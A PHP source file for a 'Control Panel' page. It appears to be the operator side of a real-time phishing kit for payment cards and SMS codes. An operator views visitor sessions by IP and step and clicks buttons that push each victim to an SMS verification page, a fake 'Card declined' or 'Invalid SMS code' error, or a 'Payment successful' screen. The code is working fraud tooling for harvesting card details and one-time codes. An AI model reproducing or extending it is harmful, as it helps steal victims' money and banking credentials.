<?php
session_start();

$sessionId = $_GET['session'] ?? '';
$action = $_GET['action'] ?? '';

if ($sessionId && $action) {
    header('Content-Type: application/json');
    $sessionsFile = __DIR__ . '/../../Config/sessions.json';
    $sessions = [];
    
    if (file_exists($sessionsFile)) {
        $sessions = json_decode(file_get_contents($sessionsFile), true) ?: [];
    }
    
    if (isset($sessions[$sessionId])) {
        $currentData = $sessions[$sessionId];
        
        switch($action) {
            case 'sms':
                $sessions[$sessionId] = [
                    'ip' => $currentData['ip'],
                    'status' => 'success',
                    'redirect' => 'sms',
                    'step' => $currentData['step'],
                    'time' => date('Y-m-d H:i:s')
                ];
                $message = "✅ Redirecting to SMS verification";
                break;
                
            case 'card_error':
                $sessions[$sessionId] = [
                    'ip' => $currentData['ip'],
                    'status' => 'invalid',
                    'redirect' => 'card_error',
                    'step' => $currentData['step'],
                    'time' => date('Y-m-d H:i:s')
                ];
                $message = "❌ Card declined";
                break;
                
            case 'sms_error':
                $sessions[$sessionId] = [
                    'ip' => $currentData['ip'],
                    'status' => 'invalid',
                    'redirect' => 'sms_error',
                    'step' => $currentData['step'],
                    'time' => date('Y-m-d H:i:s')
                ];
                $message = "❌ Invalid SMS code";
                break;
                
            case 'success':
                $sessions[$sessionId] = [
                    'ip' => $currentData['ip'],
                    'status' => 'success',
                    'redirect' => 'success',
                    'step' => $currentData['step'],
                    'time' => date('Y-m-d H:i:s')
                ];
                $message = "✅ Payment successful";
                break;
        }
        
        file_put_contents($sessionsFile, json_encode($sessions, JSON_PRETTY_PRINT));
        
        echo json_encode(['success' => true, 'message' => $message]);
    } else {
        echo json_encode(['success' => false, 'error' => 'Session not found']);
    }
    exit;
}

// Get current session data for display
$sessionData = [];
if ($sessionId) {
    $sessionsFile = __DIR__ . '/../../Config/sessions.json';
    if (file_exists($sessionsFile)) {
        $sessions = json_decode(file_get_contents($sessionsFile), true) ?: [];
        $sessionData = $sessions[$sessionId] ?? [];
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Control Panel</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 p-8">
    <div class="max-w-md mx-auto bg-white rounded-lg shadow-md p-6">
        <h1 class="text-2xl font-bold mb-4">Control Panel</h1>
        
        <?php if ($sessionData): ?>
        <div class="mb-6 bg-gray-50 p-4 rounded">
            <h2 class="font-semibold mb-2">Session Info:</h2>
            <p>IP: <?php echo htmlspecialchars($sessionData['ip'] ?? 'N/A'); ?></p>
            <p>Step: <?php echo htmlspecialchars($sessionData['step'] ?? 'N/A'); ?></p>
            <p>Status: <?php echo htmlspecialchars($sessionData['status'] ?? 'pending'); ?></p>
            <p>Last Update: <?php echo htmlspecialchars($sessionData['time'] ?? 'N/A'); ?></p>
        </div>
        <?php endif; ?>
        
        <div class="space-y-4">
            <div class="grid grid-cols-2 gap-2">
                <button onclick="updateStatus('sms')" class="bg-green-500 text-white py-2 px-4 rounded hover:bg-green-600">
                    Send SMS Code
                </button>
                <button onclick="updateStatus('card_error')" class="bg-red-500 text-white py-2 px-4 rounded hover:bg-red-600">
                    Card Error
                </button>
                <button onclick="updateStatus('sms_error')" class="bg-red-500 text-white py-2 px-4 rounded hover:bg-red-600">
                    SMS Error
                </button>
                <button onclick="updateStatus('success')" class="bg-green-500 text-white py-2 px-4 rounded hover:bg-green-600">
                    Complete Payment
                </button>
            </div>
        </div>
    </div>

    <script>
    function updateStatus(action) {
        fetch(`control.php?session=<?php echo urlencode($sessionId); ?>&action=${action}`, {
            method: 'GET'
        })
        .then(response => response.json())
        .then(data => {
            if (data.success) {
                alert(data.message);
                window.location.reload();
            } else {
                alert('Error: ' + (data.error || 'Failed to update status'));
            }
        })
        .catch(error => {
            console.error('Error:', error);
            alert('Failed to update status');
        });
    }
    </script>
</body>
</html>

